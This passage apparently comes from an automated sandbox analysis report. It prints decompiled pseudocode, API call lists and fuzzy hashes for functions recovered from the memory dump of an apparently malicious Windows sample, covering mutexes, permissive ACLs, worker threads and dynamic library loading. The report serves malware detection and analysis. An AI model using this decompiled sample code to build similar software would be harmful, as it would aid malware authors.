Opcode ID: 42a2cadbc932a715926ff7222a2c2e5f4bd2b5e85362bffd8c295efa13a93fe6
Instruction ID: 5a0a3936677ef0304e341d4e43594f78b37864cc0fc2619589e6b45d54e6a73c
Opcode Fuzzy Hash: 42a2cadbc932a715926ff7222a2c2e5f4bd2b5e85362bffd8c295efa13a93fe6
Instruction Fuzzy Hash: 7111E132A05300EBDB14EFE9EC85DAABBA9FB84324B10442AE50097191DB349900CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008BD10, Relevance: 3.1, APIs: 2, Instructions: 149
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0008BD10() {
				char _v8;
				void* _v12;
				char _v16;
				short _v20;
				char _v24;
				short _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v88;
				intOrPtr _v92;
				void _v96;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t63;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t70;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t79;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t90;
				void* _t92;
				intOrPtr _t93;
				void* _t98;

				_t90 = 8;
				_v28 = 0xf00;
				_v32 = 0;
				_v24 = 0;
				memset( &_v96, 0, _t90 << 2);
				_v20 = 0x100;
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v16 = 0;
				_push(0);
				_v8 = 0;
				_push(1);
				_v12 = 0;
				_push( &_v24);
				_t58 =  *0x9e68c; // 0xe9fab8
				_t98 = 0;
				if( *((intOrPtr*)(_t58 + 0xc))() == 0) {
					L14:
					if(_v8 != 0) {
						_t67 =  *0x9e68c; // 0xe9fab8
						 *((intOrPtr*)(_t67 + 0x10))(_v8);
					}
					if(_v12 != 0) {
						_t65 =  *0x9e68c; // 0xe9fab8
						 *((intOrPtr*)(_t65 + 0x10))(_v12);
					}
					if(_t98 != 0) {
						_t63 =  *0x9e684; // 0xe9f8f0
						 *((intOrPtr*)(_t63 + 0x34))(_t98);
					}
					if(_v16 != 0) {
						_t61 =  *0x9e684; // 0xe9f8f0
						 *((intOrPtr*)(_t61 + 0x34))(_v16);
					}
					L22:
					return _t98;
				}
				_v68 = _v12;
				_t70 =  *0x9e688; // 0xb0000
				_t92 = 2;
				_v96 = 0x1fffff;
				_v92 = 0;
				_v88 = 3;
				_v76 = 0;
				_v72 = 5;
				if( *((intOrPtr*)(_t70 + 4)) != 6 ||  *((intOrPtr*)(_t70 + 8)) < 0) {
					if( *((intOrPtr*)(_t70 + 4)) < 0xa) {
						goto L7;
					}
					goto L4;
				} else {
					L4:
					_push( &_v8);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(1);
					_push(_t92);
					_push(_t92);
					_push( &_v32);
					_t85 =  *0x9e68c; // 0xe9fab8
					if( *((intOrPtr*)(_t85 + 0xc))() == 0) {
						goto L14;
					} else {
						_t87 = _v8;
						if(_t87 != 0) {
							_push(2);
							_pop(1);
							_v64 = 0x1fffff;
							_v60 = 1;
							_v56 = 3;
							_v44 = 0;
							_v40 = 1;
							_v36 = _t87;
						}
						L7:
						_push( &_v16);
						_push(0);
						_push( &_v96);
						_t73 =  *0x9e68c; // 0xe9fab8
						_push(1); // executed
						if( *((intOrPtr*)(_t73 + 8))() != 0) {
							goto L14;
						}
						_t98 = LocalAlloc(0x40, 0x14);
						if(_t98 == 0) {
							goto L14;
						}
						_t93 =  *0x9e68c; // 0xe9fab8
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t93 + 0x90))() == 0) {
							goto L14;
						}
						_t77 =  *0x9e68c; // 0xe9fab8
						_push(0);
						_push(_v16);
						_push(1);
						_push(_t98);
						if( *((intOrPtr*)(_t77 + 0x94))() == 0) {
							goto L14;
						}
						if(_v8 != 0) {
							_t81 =  *0x9e68c; // 0xe9fab8
							 *((intOrPtr*)(_t81 + 0x10))(_v8);
						}
						_t79 =  *0x9e68c; // 0xe9fab8
						 *((intOrPtr*)(_t79 + 0x10))(_v12);
						goto L22;
					}
				}
			}

0x0008bd1b
0x0008bd1e
0x0008bd26
0x0008bd2c
0x0008bd2f
0x0008bd34
0x0008bd3a
0x0008bd3b
0x0008bd3c
0x0008bd3d
0x0008bd3e
0x0008bd3f
0x0008bd40
0x0008bd41
0x0008bd44
0x0008bd47
0x0008bd49
0x0008bd4c
0x0008bd50
0x0008bd53
0x0008bd54
0x0008bd59
0x0008bd60
0x0008be54
0x0008be58
0x0008be5a
0x0008be62
0x0008be62
0x0008be69
0x0008be6b
0x0008be73
0x0008be73
0x0008be78
0x0008be7a
0x0008be80
0x0008be80
0x0008be87
0x0008be89
0x0008be91
0x0008be91
0x0008be95
0x0008be9a
0x0008be9a
0x0008bd6b
0x0008bd6e
0x0008bd75
0x0008bd76
0x0008bd7d
0x0008bd80
0x0008bd87
0x0008bd8a
0x0008bd95
0x0008bda0
0x00000000
0x00000000
0x00000000
0x0008bda2
0x0008bda2
0x0008bda5
0x0008bda6
0x0008bda7
0x0008bda8
0x0008bda9
0x0008bdaa
0x0008bdab
0x0008bdac
0x0008bdae
0x0008bdaf
0x0008bdb3
0x0008bdb4
0x0008bdbe
0x00000000
0x0008bdc4
0x0008bdc4
0x0008bdc9
0x0008bdcb
0x0008bdcd
0x0008bdce
0x0008bdd5
0x0008bdd8
0x0008bddf
0x0008bde2
0x0008bde5
0x0008bde5
0x0008bde8
0x0008bdeb
0x0008bdec
0x0008bdf0
0x0008bdf1
0x0008bdf6
0x0008bdfc
0x00000000
0x00000000
0x0008be08
0x0008be0c
0x00000000
0x00000000
0x0008be0e
0x0008be14
0x0008be16
0x0008be1f
0x00000000
0x00000000
0x0008be21
0x0008be26
0x0008be27
0x0008be2a
0x0008be2c
0x0008be35
0x00000000
0x00000000
0x0008be3a
0x0008be3c
0x0008be44
0x0008be44
0x0008be47
0x0008be4f
0x00000000
0x0008be4f
0x0008bdbe

APIs

SetEntriesInAclA.ADVAPI32(00000001,001FFFFF,00000000,?), ref: 0008BDF7
LocalAlloc.KERNEL32(00000040,00000014), ref: 0008BE02

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AllocEntriesLocal
String ID:
API String ID: 2146116654-0
Opcode ID: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
Instruction ID: 3aa66279fdb8b3e8acfe9a35cde7f6eb8d9a09b5f03ef1515584b77c0f26ffcf
Opcode Fuzzy Hash: abd2abb1c2a675e30db1c05a41365c71064cf18d764b66cf42dc4a5385c88731
Instruction Fuzzy Hash: C3512A71A00248EFEB64DF99D888ADEBBF8FF44704F15806AF604AB260D7749D45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 000898EE, Relevance: 3.1, APIs: 2, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E000898EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0x9e76c; // 0x1d0
				_t73 = 0;
				if(E0008A4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0x9e770; // 0xe80c40
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0x9e770; // 0xe80c40
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0x9e770; // 0xe80c40
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0x9e770; // 0xe80c40
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E0008A471(0, 1);
									_t82 =  *0x9e770; // 0xe80c40
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0x9e770; // 0xe80c40
									_t30 = _t83 + _t113 + 4; // 0xe80c44
									_t52 = CreateThread(_t73, _t73, E000898A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0x9e770; // 0xe80c40
									 *(_t113 + _t53) = _t52;
									_t54 =  *0x9e770; // 0xe80c40
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0x9e770; // 0xe80c40
										 *0x9e774 =  *0x9e774 + 1;
										E0008A4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0x9e770; // 0xe80c40
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0x9e684; // 0xe9f8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0x9e770; // 0xe80c40
										_t37 = _t61 + 0xc; // 0xe80c4c
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E0008861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0x9e770; // 0xe80c40
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0x9e76c; // 0x1d0
									E0008A4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E00088604(_t110);
								_t97 =  *0x9e770; // 0xe80c40
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0x9e770; // 0xe80c40
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0x9e770; // 0xe80c40
								E000886E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0x9e684; // 0xe9f8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0x9e770; // 0xe80c40
							goto L7;
						}
						_t98 =  *0x9e770; // 0xe80c40
						E0008984A(_t106 + _t98, 0);
						_t45 =  *0x9e770; // 0xe80c40
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}

0x000898f1
0x000898f2
0x000898f3
0x000898fb
0x000898fe
0x00089905
0x0008990e
0x00089917
0x0008991e
0x00089920
0x00089922
0x00089922
0x00089927
0x0008994f
0x00089952
0x0008996c
0x00089972
0x000899b2
0x000899b6
0x000899bb
0x000899bf
0x000899bf
0x000899cb
0x000899cf
0x000899d7
0x000899dd
0x000899e2
0x000899e8
0x000899ec
0x000899f4
0x00089a06
0x00089a0b
0x00089a10
0x00089a13
0x00089a18
0x00089a1d
0x00089a59
0x00089a5f
0x00089a65
0x00089a6f
0x00089a74
0x00089a7a
0x00089a1f
0x00089a23
0x00089a28
0x00089a2b
0x00089a30
0x00089a33
0x00089a37
0x00089a3e
0x00089a43
0x00089a49
0x00089a51
0x00089a52
0x00089a52
0x00089a7c
0x00089a7c
0x00089a82
0x00089a88
0x00089a8b
0x00089a8d
0x00089a8d
0x00089974
0x00089978
0x0008997e
0x00089984
0x00089988
0x00089991
0x00000000
0x00000000
0x00089997
0x0008999b
0x000899a8
0x000899ad
0x00000000
0x000899ad
0x00000000
0x00089952
0x00089929
0x0008992e
0x0008992f
0x00089938
0x00089965
0x00000000
0x00089965
0x0008993a
0x00089945
0x0008994a
0x00000000
0x00089954
0x00089954
0x00089957
0x00089958
0x00000000
0x00089960
0x00089910
0x00000000

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cadc4244450b856390e4109349fe98e1b04985f9c6077f91c07d36e44fa3e3d
Instruction ID: 2208b45a903d8e4e3ebf4af7583ef236fbc94e4c18dfd99628fde9c82a46c99b
Opcode Fuzzy Hash: 0cadc4244450b856390e4109349fe98e1b04985f9c6077f91c07d36e44fa3e3d
Instruction Fuzzy Hash: 4F515171614640DFEB69EFA8DC84876F7F9FB48314358892EE48687361D735AC02CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00085631, Relevance: 3.1, APIs: 2, Instructions: 97
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00085631(void* __edx, void* __edi) {
				char _v44;
				void* _t8;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t49;
				void* _t54;

				_t54 = __edi;
				_t8 = E00089E66(0x3b); // executed
				if(_t8 != 0xffffffff) {
					L2:
					E0008980C(0x9e6c8);
					_t39 = 0x37; // executed
					E00089F06(_t39);
					_t11 =  *0x9e688; // 0xb0000
					_t40 = 0x3a; // executed
					E00089F06(_t40); // executed
					E0008E4C1(_t63);
					_t14 =  *0x9e688; // 0xb0000
					_t41 =  &_v44;
					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
					E0008A86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
					_t17 =  *0x9e684; // 0xe9f8f0
					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x9e6c8,  *0x9e6cc);
					 *0x9e74c = _t18;
					if(_t18 != 0) {
						_t20 = CreateMutexA(0, 0, 0);
						 *0x9e76c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							_t34 = E00088604(0x1000); // executed
							_t52 = 0;
							 *0x9e770 = _t34;
							_t49 =  *0x9e774; // 0x2
							__eflags = _t34;
							_t41 =  !=  ? 0 : _t49;
							 *0x9e774 =  !=  ? 0 : _t49; // executed
						}
						E0008153B(_t41, _t52); // executed
						E000898EE(E00082EDA, 0, __eflags, 0, 0); // executed
						E00083017(); // executed
						E000831C2(0, __eflags); // executed
						E000829B1(); // executed
						E00083BB2(_t54, __eflags); // executed
						while(1) {
							__eflags =  *0x9e758; // 0x0
							if(__eflags != 0) {
								break;
							}
							E0008980C(0x9e750);
							_push(0x9e750);
							_push(0x9e750); // executed
							E0008279B();
							Sleep(0xfa0);
						}
						E00083D34();
						E00089A8E();
						E000834CB();
						_t33 = 0;
						__eflags = 0;
					} else {
						goto L3;
					}
				} else {
					_t36 = E00082DCB();
					_t63 = _t36;
					if(_t36 != 0) {
						L3:
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x00085631
0x0008563d
0x00085646
0x00085651
0x00085656
0x00085669
0x0008566a
0x0008566f
0x0008567f
0x00085680
0x00085688
0x0008568d
0x00085692
0x0008569c
0x0008569f
0x000856a9
0x000856b1
0x000856b7
0x000856be
0x000856d0
0x000856d6
0x000856db
0x000856dd
0x000856e4
0x000856e9
0x000856eb
0x000856f1
0x000856f7
0x000856f9
0x000856fc
0x000856fc
0x00085702
0x00085710
0x00085717
0x0008571c
0x00085721
0x00085726
0x00085750
0x00085750
0x00085756
0x00000000
0x00000000
0x00085732
0x00085737
0x00085738
0x00085739
0x0008574a
0x0008574a
0x00085758
0x0008575d
0x00085762
0x00085767
0x00085767
0x00000000
0x00000000
0x00000000
0x00085648
0x00085648
0x0008564d
0x0008564f
0x000856c0
0x000856c2
0x00000000
0x00000000
0x00000000
0x0008564f
0x0008576d

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000856D0

Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839

Sleep.KERNELBASE(00000FA0), ref: 0008574A

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Time$CreateFileMutexSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3249252070-0
Opcode ID: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
Instruction ID: 618d9e32d6944c2961c1c58ef027407fe41e2fb87ac27e57644674ab890b217f
Opcode Fuzzy Hash: fd4bb5a668434b88d5c04a99dfde256102c0f641a73eee2e9a85173188a96518
Instruction Fuzzy Hash: 0031D6312056509BF724FBB5EC069EA3B99FF557A0B144126F5C9861A3EE349900C763

Uniqueness

Uniqueness Score: -1.00%

Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0xe9f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0xe9f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t60 = E00088604(_t4);
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}

0x0008a6ac
0x0008a6ad
0x0008a6ae
0x0008a6b2
0x0008a6b4
0x0008a6b9
0x0008a6c9
0x0008a6cd
0x0008a757
0x0008a757
0x0008a759
0x0008a75b
0x0008a75d
0x0008a75d
0x0008a6d3
0x0008a6e1
0x0008a6e5
0x0008a73d
0x0008a73d
0x0008a743
0x0008a748
0x0008a750
0x0008a756
0x00000000
0x0008a748
0x0008a6e7
0x0008a6f0
0x0008a6f2
0x0008a6f8
0x00000000
0x00000000
0x0008a6fc
0x0008a6ff
0x0008a700
0x0008a706
0x0008a707
0x0008a708
0x0008a72d
0x0008a70f
0x0008a761
0x00000000
0x00000000
0x0008a763
0x0008a766
0x0008a76c
0x0008a76e
0x0008a76e
0x0008a776
0x0008a779
0x00000000
0x0008a779
0x0008a717
0x0008a71a
0x0008a71e
0x0008a720
0x0008a723
0x0008a728
0x0008a72c
0x0008a72c
0x00000000
0x0008a72d
0x0008a6bb
0x00000000

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615), ref: 0008A733
CloseHandle.KERNELBASE(00000000,?,0008FA56,00000000,0008F8B5,000AEFE0,0009B990,00000000,0009B990,00000000,00000000,00000615,0000034A,00000000,00E9FD30,00000400), ref: 0008A776

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: a34129b748d1e948e0603bfe7886cfa0a731461f5cd668a30662b867c12b276b
Instruction ID: 682a662acdfee72883915282426476a47a31b64306a9f0d0b2be5f1f474e3a22
Opcode Fuzzy Hash: a34129b748d1e948e0603bfe7886cfa0a731461f5cd668a30662b867c12b276b
Instruction Fuzzy Hash: DE218D76B04205AFEB50EF64CC84FAA77FCBB05744F10806AF946DB642E770D9409B91

Uniqueness

Uniqueness Score: -1.00%

Function 0008153B, Relevance: 3.1, APIs: 2, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0008153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0x9e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0x9e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00081080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0x9e6e8 = E000891A6(_t3, 0);
							E000885C2( &_v8);
							_t7 = E00088604(0x100);
							 *0x9e6f0 = _t7;
							if(_t7 != 0) {
								 *0x9e6fc = 0;
								_t9 = E00088604(0x401);
								 *0x9e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0x9e6c0; // 0x0
									if(__eflags == 0) {
										E000915B6(0x88202, 0x8820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E0008E1BC(0x9bd28, _t24); // executed
									 *0x9e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}

0x0008153e
0x00081545
0x0008154b
0x00081552
0x00081607
0x00081607
0x00081607
0x00081558
0x0008155b
0x00081561
0x00081568
0x00000000
0x0008156e
0x00081573
0x00081578
0x0008157d
0x00000000
0x00081583
0x0008158f
0x00081594
0x0008159e
0x000815a3
0x000815ab
0x000815b9
0x000815bf
0x000815c4
0x000815ca
0x000815cc
0x000815d2
0x000815d8
0x000815e4
0x000815ea
0x000815eb
0x000815f2
0x000815f8
0x000815fd
0x00081602
0x000815ce
0x000815ce
0x00000000
0x000815ce
0x000815ad
0x000815ad
0x000815af
0x000815af
0x000815af
0x000815ab
0x0008157d
0x00081568
0x0008160c

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 00081545
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00085707), ref: 0008155B

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CreateMutex$AllocateHeap
String ID:
API String ID: 704353917-0
Opcode ID: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
Instruction ID: ebe42fdb1850e6894ca3f7a01c19cd8768a376f5bc184f032faea728c04dbff3
Opcode Fuzzy Hash: 7c5440741e29b163d5f23002852b46c6bf079362bade3a3716c064fcde357f5f
Instruction Fuzzy Hash: A111C871604A82AAFB60FB76EC059AA36E8FFD17B0760462BE5D1D51D1FF74C8018710

Uniqueness

Uniqueness Score: -1.00%

Function 00085974, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00085974(void* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v52;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t27;
				void* _t42;

				_t42 = __edx;
				_v8 = 0;
				E0008A86D( &_v52, __ecx, __eflags);
				_t16 =  *0x9e688; // 0xb0000
				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
					L1:
					_t27 =  *0x9e684; // 0xe9f8f0
					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
					goto L1;
				}
				_push(0);
				_push( &_v52);
				_push("\\");
				_v12 = E00089292("Global");
				_t19 = E0008590C(_t18, _t42,  &_v8); // executed
				__eflags = _t19 - 1;
				if(_t19 == 1) {
					CloseHandle(_v8);
					_v8 = 0;
					E0008590C( &_v52, _t42,  &_v8); // executed
				}
				E0008861A( &_v12, 0xffffffff);
				return _v8;
			}

0x0008597c
0x00085982
0x00085988
0x0008598d
0x00085998
0x0008599a
0x0008599a
0x000859a1
0x00000000
0x000859a1
0x000859a9
0x000859ad
0x000859ae
0x000859c0
0x000859c8
0x000859d0
0x000859d3
0x000859dd
0x000859e3
0x000859ec
0x000859f1
0x000859f8
0x00085a05

APIs

CloseHandle.KERNELBASE(00085DD4,?,?,?,?,00000002), ref: 000859DD

Strings

Global, xrefs: 000859B3

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID: Global
API String ID: 2962429428-4020866741
Opcode ID: aca2857cd06624d21f417f9f9489c735cf79b42b59a9276bf8b949286003dd4b
Instruction ID: ad9e46771b38e1f6345cb022d52bc1c5a3711b7f461b92f87be1531e78fdffdd
Opcode Fuzzy Hash: aca2857cd06624d21f417f9f9489c735cf79b42b59a9276bf8b949286003dd4b
Instruction Fuzzy Hash: 42117C72A04118EBDB00FB98ED45CDDB7F8FB90321F20006AF485E7292EA309E00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0008E1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000895C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E0008E171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000885C2( &_v8);
				return _t25;
			}

0x0008e1bf
0x0008e1c2
0x0008e1c8
0x0008e1ca
0x0008e1cf
0x0008e1d1
0x0008e1db
0x0008e1dc
0x0008e1eb
0x0008e1de
0x0008e1de
0x0008e1de
0x0008e1ef
0x0008e1f6
0x0008e1fc
0x0008e1fc
0x0008e201
0x0008e20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB

Memory Dump Source

Source File: 00000006.00000002.819616728.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction ID: eaac88a08efcd0d2a3f1dbc0b3101d04e6d50373736468e8fc033cf0e2f21452
Opcode Fuzzy Hash: 34ee8c9432c501ef63b31a96de4864626031fe048823fd25d1229eb6e9450f54
Instruction Fuzzy Hash: EBF0EC32700114ABDB44BB6DDC898AEB7EDBF54790714403AF406D3251DE70DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00082C8F, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00082C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E0008B700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
